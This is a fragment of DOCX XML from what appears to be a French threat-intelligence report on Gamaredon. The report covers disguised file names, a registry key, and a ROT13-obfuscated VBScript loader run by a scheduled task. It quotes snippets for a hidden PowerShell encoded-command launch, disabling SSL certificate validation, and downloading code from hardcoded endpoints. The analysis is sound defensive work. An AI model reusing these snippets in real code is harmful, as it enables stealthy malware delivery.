                            <a:pt x="5730239" y="2825115"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="2294255"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="2294255"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1763394"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="1763394"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1232535"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="1232535"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="701674"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="701674"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="3174"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5736589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9728" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4234180</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>996959</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="3346449"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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3464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346449">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="33464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1776" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5718810</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>990609</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="911863" cy="3359149"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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1863" cy="3359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1860" h="3359149">
                          <a:moveTo>
                            <a:pt x="911860" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="911860" y="3359149"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="6349"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="335279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4848" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5092065</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5334009</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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6896" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3829685</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5334009</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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792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3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894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3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9968" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5923914</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1002053</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="579003" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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0992" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4488179</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1175408</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1013084" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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2016" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5880735</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1175408</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="664728" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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7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première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0" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1924049</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1175408</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1323915" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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9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4064" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5788024</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1348763</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="811871" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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8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soumission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50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1693810</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3256197" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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7f35c860275e5eb45e9a9e2fa29a7f8b0b6cf5aaa8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6112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1782075</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="572420" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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~system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7136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1789453</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="454983" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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9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18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81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1870340</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1722850" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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1413a65841aaf192f5f274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91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2224670</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3256197" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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641ce7be635d14fdb51fb5c570f445aaa202911154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0208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2312935</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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desktop.ini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1232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2320313</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="454983" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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9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15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22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2401200</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1722850" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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1a320e5c71cc25f4c98a7e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2755530</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3256197" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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5905b9d78a5f417d5462b955eeef1bdc6710062f6e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4304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2843795</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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desktop.ini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5328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2851173</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="377450" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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4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63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2932060</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1722850" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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0e769c9b4cf0c6954f2ba9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73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3286390</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3256197" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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d80d5f07e268d876cfc91395f6e6fb65e0a39fc2c5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8400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3374655</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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vbscriptworm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9424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3382033</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="377450" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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4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6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04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3462920</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1722850" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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055424805b2d497175cd82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14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3817250</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3256197" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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57c523a45892a33f23194d15fa2f0e061d3a7113d2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2496" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4269739</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3905515</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="649116" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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eset.vbs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0" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5754370</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3912893</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="377450" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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4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4 mai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45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3993780</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1722850" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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983d2c82b10624a83e856b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5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4594248</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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Les résultats mettent en évidence une activité soutenue de Gamaredon. Plusieurs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6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4767603</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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conventions de nommage sont observées, notamment l'utilisation de fichiers se faisant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7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4938025</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5834898" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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passer pour des composants système (</w:t>
                        </w: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usb.sys</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="25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desktop.ini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), des scripts (</w:t>
                        </w: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eset.vbs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8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5117730</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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vbscriptworm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) ou des fichiers cachés (</w:t>
                        </w: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~system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  <w:u w:val="single" w:color="000000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30"/>
                            <w:spacing w:val="32"/>
                            <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">~.vxd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). Malgré c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ette diversité apparente,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9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5318983</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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l'utilisation persistante de la clé de registre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WindowsResponby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suggère une continuité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0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5515633</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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opérationnelle et probablement une réutilisation de portions significatives du code ou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1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5688988</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1156789" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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678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chaîne d'infection.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27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3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3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478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3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580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3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683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30809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9581524</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1828800" cy="6349"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13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0144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7089149</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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2192" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5233034</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7089149</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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73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7303779</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5443219" cy="216538"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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3219" cy="216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43219" h="216535">
                          <a:moveTo>
                            <a:pt x="1061720" y="216535"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1424940" y="21653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5442584" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5442584" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="544321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2672" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1962785</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7519679</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3414395" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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4395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4395" h="199389">
                          <a:moveTo>
                            <a:pt x="2641599" y="199389"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2641599" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3413760" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3413760" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2640965" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3414395" y="634"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1732279" y="199389"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1732279" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2095500" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2095500" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1731644" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2096134" y="634"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="866139" y="199389"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="866139" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1391920" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1391920" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="865504" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1392554" y="634"/>
                          </a:lnTo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361949" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="36194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0" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6584314</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8356609</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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086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8356609</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="773430" cy="414020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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430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430" h="414020"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772795" y="214629"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="772795" y="414020"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="215265"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="773430" y="21526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2912" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3474085</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8959859</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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0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8959859</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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5984" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1449069</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2014217</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4244339" cy="4465319"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="140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alphaModFix/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect l="0" r="-14" t="-13" b="0"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4244339" cy="4465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44339" h="4465319">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="4465319"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4244339" y="4465319"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="424433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700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803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9056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1230655</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1153625" cy="189848"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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3625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4.2.3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3e stage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0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1540140</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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Cette troisième étape (condensat MD5 : </w:t>
                        </w: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d2a6009587b3cb73355c2d1e53d5cdfa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) peut,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1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1722778</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3520627" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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062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fois de plus, être considérée comme un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 loader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VBScript.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2128" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1726565</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6456065</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4145978" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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597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9 – Troisième étape du loader pouvant déployer une charge utile arbitraire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3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6708798</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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Le code récupéré utilise une technique d'obfuscation ROT13 et son exécution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4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6882153</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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programmée toutes les 11 minutes via une tâche planifiée. Une fois dé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sobfusqué, il instancie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7074123</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5878575" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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5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1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">un processus Powershell</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="11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 caché</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08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 via</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08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8"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> la</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="12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commande</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="26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WScript.Shell.Run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622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7289388</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817753" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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"powershell.exe -nol -nop -encodedcommand [charge utile Base64]"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle31"/>
                            <w:spacing w:val="13"/>
                            <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">, 0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7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7504653</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3276345" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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34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Les arguments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-nol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 (pour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NoLogo</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="29"/>
                          </w:rPr>
                          <w:t xml:space="preserve">) et </w:t>
                        </w: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-nop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8272" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4190365</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7504653</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2544963" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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496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 (pour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NoProfile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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">) sont utilisés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9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7701303</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5212839" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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283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masquer la bannière de démarrage et contourner le chargement du profil utilisateur.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0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7976258</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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Cette charge utile encodée en Base64 fait office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. Dans un premier temps, elle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1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8149613</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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désactive</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="3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8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3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8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validation</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="3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8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des</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="3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8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certificats</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="3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8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SSL</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="32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8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8"/>
                            <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">via</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="59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236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8341583</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5672187" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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218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[System.Net.ServicePointManager]::ServerCertificateValidationCallback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339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8556848</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817118" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="14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={$true};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. Elle lance ensuite une série de tentatives de connexion en cascade vers trois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4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8753498</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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points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de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terminaison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4"/>
                            <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">codé</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="52"/>
                          </w:rPr>
                          <w:t xml:space="preserve">s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dur.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script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utilise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8945468</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817753" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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$webClient.DownloadString($url)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 au sein d’une boucle. Comme cette méthode lève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6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9142118</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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une exception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26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à la réception de codes d’erreur HTTP (par exemple, 404, 500), le script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4654841" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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484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26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https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadstring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85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953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056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158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4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26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4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378752" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6051549</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1887229</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="609600" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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0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608964" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="608964" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="60960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28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2103129</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="854709" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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70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709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854074" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="854074" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="85470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387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3963667</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5759449" cy="5459107"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="143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alphaModFix/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect l="-11" r="-11" t="-23" b="0"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5759449" cy="5459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5459107">
                          <a:moveTo>
                            <a:pt x="0" y="5459107"/>
                          </a:moveTo>
                          <a:lnTo>
